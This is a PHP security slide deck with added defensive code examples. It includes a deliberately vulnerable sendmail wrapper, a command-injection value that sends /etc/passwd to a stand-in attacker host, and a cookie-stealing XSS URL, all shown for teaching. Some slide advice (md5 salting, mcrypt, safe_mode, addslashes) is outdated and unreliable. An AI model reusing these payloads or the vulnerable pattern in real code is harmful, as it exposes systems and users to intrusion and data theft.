ABC of Securing PHP code - PowerPoint PPT Presentation

Slides: 16
Provided by: foss

Transcript and Presenter's Notes

1
ABC of Securing PHP code
  • Dr. Tarique Sani
  • C.T.O. SANIsoft
  • Nagpur, India

2
Why, Who, What is this talk about?
  • PHP is very popular and easily learned in a weekend
  • Designers are usually not aware of security
  • New and Intermediate PHP programmers and PHP
    trolls
  • Outline the most common security issues seen in
    web applications
  • Simple solutions for each of them in PHP

3
What this talk is not...
  • This is not a comprehensive guide
  • This is not a talk on cracking security flaws
  • Will not talk about specific software flaws
  • This is not about PHP installation or server
    configuration

4
OWASP - Top Ten
  • Unvalidated Parameters
  • Broken Access Control
  • Broken Account and Session Management
  • XSS Flaws
  • Buffer Overflows
  • Command Injection
  • Error Handling Problems
  • Insecure use of cryptography
  • Remote Admin Flaws
  • Server Misconfiguration

http://www.owasp.org
5
Unvalidated Parameters
  • What are they and why are they harmful
  • Example of a mail class method that passes form fields straight to the shell
    (the vulnerable code the slide shows, with PHP syntax restored):

    // Vulnerable: $this->from and $this->to come from the form unvalidated
    // and are concatenated into a shell command line.
    function Send($sendmail = "/usr/sbin/sendmail")
    {
        if ($this->from == "")
            $fp = popen($sendmail . " -i " . $this->to, "w");
        else
            $fp = popen($sendmail . " -i -f " . $this->from . " " . $this->to, "w");
    }

  • A crafted address field then becomes extra shell syntax, for example:
    dummy@dummy.com badguy@evil_host.com < /etc/passwd rm

6
Unvalidated Parameters 2
  • Don't turn register_globals on! (off by default
    since 4.2.0)
  • Never trust user input: always validate; often a
    regular expression is enough.
  • [a-zA-Z ] matches all chars from a-z, A-Z and the space
  • Ready made regular expressions:
    http://regexlib.com
  • Use Form Libraries to ease up form validation
    cycle
  • PEAR HTML_QuickForm
  • OOH Forms
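
An added example of the allow-list validation the slide recommends; it is not code from the slides or from the libraries they name. Field names, patterns and the sample request are constructed for illustration. It anchors every pattern at both ends (a bare `$` in PCRE still permits a trailing newline, hence `\z`) and uses PHP's built-in e-mail filter rather than a home-grown expression:

```php
<?php
// Added example (not from the slides): allow-list validation of request
// parameters before they reach popen()/exec(), SQL or HTML output.
// The field names, rules and sample input below are constructed.
declare(strict_types=1);

/**
 * Validate one field against an anchored pattern. Anchors matter: without
 * them preg_match() succeeds as soon as any substring matches.
 */
function validateField(string $value, string $pattern): ?string
{
    return preg_match($pattern, $value) === 1 ? $value : null;
}

/**
 * Validate the whole form. Returns [validatedValues, errors]; a rejected
 * field is simply absent from the validated array, so nothing unvalidated
 * reaches the caller.
 */
function validateForm(array $input): array
{
    $rules = [
        // letters, digits, underscore, 3..32 chars: a typical username.
        // \z (not $) so that "name\n" is rejected as well.
        'uname' => '/^[A-Za-z0-9_]{3,32}\z/',
        // digits only: an id that will be cast to int afterwards
        'id'    => '/^[0-9]{1,10}\z/',
    ];
    $clean  = [];
    $errors = [];
    foreach ($rules as $field => $pattern) {
        $raw = $input[$field] ?? '';
        $ok  = validateField((string) $raw, $pattern);
        if ($ok === null) {
            $errors[$field] = 'invalid value';
        } else {
            $clean[$field] = $ok;
        }
    }
    // E-mail addresses: the built-in filter is safer than a hand-written regex.
    $email = filter_var($input['from'] ?? '', FILTER_VALIDATE_EMAIL);
    if ($email === false) {
        $errors['from'] = 'invalid e-mail address';
    } else {
        $clean['from'] = $email;
    }
    return [$clean, $errors];
}

// Constructed sample request: two benign fields and one carrying the kind
// of shell syntax the sendmail method on slide 5 would pass straight on.
$sample = [
    'uname' => 'tarique',
    'id'    => '42',
    'from'  => 'dummy@dummy.com badguy@evil_host.com < /etc/passwd',
];
[$clean, $errors] = validateForm($sample);
print_r($clean);   // uname and id only
print_r($errors);  // from => invalid e-mail address
```

The rejected `from` value never leaves `validateForm()`, which is the property that matters: validation happens once, at the boundary, and later code only ever sees values that matched an allow-list.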

7
Broken Access Control
  • Problem - poorly written, poorly understood
    authentication libraries
  • Solution - use accepted and tried libs like
  • PEAR Auth and Auth_HTTP
  • PHPlib Auth
  • Add security by using an md5 hash of a secret salt and the data:

    $secretWord = 'boogarel';
    $userId = 'sde123d4';
    $hash = md5($secretWord . $userId);
    setcookie('id', $userId . '-' . $hash);
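
The slide shows how to issue the signed cookie but not how to check it on the next request. The following added example (not from the slides) keeps the same `id-hash` cookie layout and supplies that verification step; it swaps `md5($secret . $data)` for `hash_hmac()`, since the secret-prefix construction is open to length extension and md5 is no longer collision resistant. The secret and user id are constructed values; the `setcookie()` options array needs PHP 7.3 or later:

```php
<?php
// Added example, not from the slides: the "id-hash" cookie of slide 7 with a
// verification step, using an HMAC instead of md5(secret . data).
declare(strict_types=1);

// Constructed secret; in practice a long random value kept outside the web root.
const SECRET_WORD = 'boogarel';

/** Build the cookie value "userId-hash". */
function signUserId(string $userId): string
{
    return $userId . '-' . hash_hmac('sha256', $userId, SECRET_WORD);
}

/** Return the user id if the cookie is authentic, null otherwise. */
function verifyUserCookie(string $cookie): ?string
{
    $pos = strrpos($cookie, '-');
    if ($pos === false) {
        return null;
    }
    $userId   = substr($cookie, 0, $pos);
    $given    = substr($cookie, $pos + 1);
    $expected = hash_hmac('sha256', $userId, SECRET_WORD);
    // hash_equals() runs in constant time, so the comparison cannot be
    // probed byte by byte through response timing.
    return hash_equals($expected, $given) ? $userId : null;
}

$cookie = signUserId('sde123d4');
setcookie('id', $cookie, ['httponly' => true, 'secure' => true, 'samesite' => 'Lax']);

// What the next request does with $_COOKIE['id']:
var_dump(verifyUserCookie($cookie));                          // string(8) "sde123d4"
var_dump(verifyUserCookie('sde123d5-' . substr($cookie, 9))); // NULL: id altered, hash no longer matches
var_dump(verifyUserCookie('garbage'));                        // NULL: no separator
```

The user id in the cookie is only trusted after `verifyUserCookie()` returns it; code that reads `$_COOKIE['id']` directly and splits on the dash has the signature but never checks it.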

8
Broken Account Sessions
  • Use PHP's built-in session management.
  • Store the sessions in a database or in a part of
    the file system that only trusted users can
    access, not the globally readable /tmp.
  • Use an SSL connection when needed
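
The three points above as runtime settings, in an added example that is not from the slides: a private save path instead of `/tmp`, strict-mode and cookie-only session ids, and the secure/httponly cookie flags for the SSL case. The save path is a placeholder and must exist and be writable by the web server user (mode 0700) before `session_start()` is called; the `session_set_cookie_params()` options array needs PHP 7.3 or later:

```php
<?php
// Added example, not from the slides: session hardening before session_start().
declare(strict_types=1);

function startHardenedSession(string $savePath): void
{
    // Keep session files out of the world-readable /tmp. $savePath is a
    // placeholder; the directory belongs to the web server user, mode 0700.
    ini_set('session.save_path', $savePath);
    ini_set('session.use_strict_mode', '1');   // reject ids the server never issued
    ini_set('session.use_only_cookies', '1');  // never accept the id from the URL
    session_set_cookie_params([
        'secure'   => true,   // cookie travels only over SSL/TLS
        'httponly' => true,   // not readable by script, limits cookie theft via XSS
        'samesite' => 'Lax',
    ]);
    session_start();
}

/**
 * Call after a successful login. Issuing a fresh id means a session id
 * handed to the browser before authentication cannot be reused afterwards.
 */
function loginUser(string $userId): void
{
    session_regenerate_id(true);  // true: delete the old session file as well
    $_SESSION['user'] = $userId;
}

startHardenedSession('/var/lib/php/sessions/app'); // placeholder path
loginUser('sde123d4');
echo 'session id: ', session_id(), "\n";
```

`session.use_strict_mode` is the setting that makes a database or private-directory store effective: without it PHP accepts any id the client presents and creates a session for it.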

9
XSS Flaws
  • What is it?
  • Inserting / gathering malicious data, most often
    by using a specially crafted URL
  • http://www.phpnuke.org/user.php?op=userinfo&uname=<script>alert(document.cookie)</script>
  • Solution!
  • htmlspecialchars(), strip_tags(), utf8_decode()
  • http://www.cgisecurity.com/articles/xss-faq.txt
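
An added example, not from the slides, showing the reflected parameter from the URL above once as the slide's vulnerable pattern and once encoded with `htmlspecialchars()` at output time. The request value is constructed to match the payload shape in the URL; it also shows why `strip_tags()` alone is not an encoding step:

```php
<?php
// Added example, not from the slides: reflecting a request parameter into
// HTML, vulnerable form beside the fixed form.
declare(strict_types=1);

// Constructed request value, same shape as the uname= parameter on slide 9.
$uname = '<script>alert(document.cookie)</script>';

// Vulnerable: the parameter is copied into the page unchanged.
function renderUnsafe(string $uname): string
{
    return "<p>User: $uname</p>";
}

// Encode for the HTML context. ENT_QUOTES also encodes single quotes, so the
// same helper is safe inside quoted attributes; ENT_SUBSTITUTE keeps invalid
// UTF-8 from making the function return an empty string silently.
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function renderSafe(string $uname): string
{
    return '<p>User: ' . e($uname) . '</p>';
}

echo renderUnsafe($uname), "\n";
// <p>User: <script>alert(document.cookie)</script></p>   (browser runs it)

echo renderSafe($uname), "\n";
// <p>User: &lt;script&gt;alert(document.cookie)&lt;/script&gt;</p>   (shown as text)

// strip_tags() removes tags but does not encode what remains; a bare quote
// or angle bracket left inside an attribute can still break out of it.
echo strip_tags($uname), "\n";
// alert(document.cookie)
```

The rule the example illustrates is to store input as-is (after validation) and encode for the output context at the point where it is written into the page.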

10
Command Injection
  • What is it?
  • exec(), system(), passthru(), backtick operator
  • Solutions
  • escapeshellcmd()
  • escapeshellarg()
  • realpath()
  • addslashes()
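
An added example, not from the slides, rebuilding the command line from the sendmail method on slide 5 with `escapeshellarg()`, so that each address becomes exactly one shell word whatever it contains. The input value is constructed; note that `addslashes()`, which the slide also lists, escapes quotes for string literals and is not a shell-quoting function:

```php
<?php
// Added example, not from the slides: building a shell command from user
// data with escapeshellarg() instead of plain concatenation.
declare(strict_types=1);

const SENDMAIL = '/usr/sbin/sendmail'; // fixed path, never user controlled

/**
 * Build the sendmail command line. The option switches are fixed strings;
 * every user-supplied value is wrapped by escapeshellarg(), which single-
 * quotes it and escapes embedded quotes, so it can only ever be one argument.
 */
function buildSendmailCommand(string $to, string $from = ''): string
{
    $cmd = SENDMAIL . ' -i';
    if ($from !== '') {
        $cmd .= ' -f ' . escapeshellarg($from);
    }
    return $cmd . ' ' . escapeshellarg($to);
}

// Constructed payload of the kind shown on slide 5.
$payload = 'dummy@dummy.com badguy@evil_host.com < /etc/passwd';

echo buildSendmailCommand($payload), "\n";
// /usr/sbin/sendmail -i 'dummy@dummy.com badguy@evil_host.com < /etc/passwd'
// One argument: the redirection and the second address are plain characters
// to the shell, not syntax.

echo buildSendmailCommand('dummy@dummy.com', "it's@example.com"), "\n";
// /usr/sbin/sendmail -i -f 'it'\''s@example.com' 'dummy@dummy.com'
```

Escaping stops the shell from interpreting the value, but the program that receives the argument still sees it; validating that the value is actually an e-mail address before it gets this far (with `filter_var()` and `FILTER_VALIDATE_EMAIL`) keeps non-addresses away from sendmail entirely.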

11
Error Handling problems
  • Error output can display sensitive info
  • Eg: Warning: Access denied for user
    tarique@localhost (using password: NO)
  • Solution
  • die statements
  • log_errors = On
  • display_errors = Off
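
The two ini settings above applied at runtime, in an added example that is not from the slides, together with error and exception handlers that send full detail to the log and a generic message to the browser. The log path is a placeholder and must not be reachable over the web; the failing call at the end is simulated with the message shown on the slide:

```php
<?php
// Added example, not from the slides: keep error detail in the log, out of
// the response.
declare(strict_types=1);

ini_set('display_errors', '0');                // nothing sensitive reaches the browser
ini_set('log_errors', '1');
ini_set('error_log', '/var/log/php/app.log');  // placeholder; not under the web root
error_reporting(E_ALL);

// Warnings and notices: log file, line and message, print nothing.
set_error_handler(function (int $no, string $str, string $file, int $line): bool {
    error_log(sprintf('[%d] %s in %s:%d', $no, $str, $file, $line));
    return true; // handled; PHP's built-in printer is not invoked
});

// Uncaught exceptions: same treatment plus a generic page for the user.
set_exception_handler(function (Throwable $e): void {
    error_log(get_class($e) . ': ' . $e->getMessage() . "\n" . $e->getTraceAsString());
    http_response_code(500);
    echo "Sorry, something went wrong. The problem has been logged.\n";
});

// Simulated failure of the kind slide 11 shows. The user name and host stay
// in the log; the browser only sees the generic message above.
throw new RuntimeException('Access denied for user tarique@localhost (using password: NO)');
```

With `display_errors` off, a database error such as the one on the slide can no longer reveal the account name or whether a password was used; with `log_errors` on, the same detail is still available to the administrator.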

12
Insecure use of Cryptography
  • Not directly PHP scripting related
  • Use mcrypt functions
  • Store the keys and salt securely

13
Remote Administration Flaws
  • Not directly PHP scripting related
  • SSL connection to prevent sniffing of passwords
    and content
  • Change default passwords of third party tools
  • Remove install files
  • Keep admin tools on a different server than the public
    server

14
Web and Application Server config
  • Not directly PHP scripting related
  • safe_mode
  • safe_mode commands

15
Conclusion
  • This just scratches the tip of the iceberg
  • Ensuring security in PHP is simple and very
    effective
  • Keeping abreast of PHP development pays
  • Discuss more at in-phpug@yahoogroups.com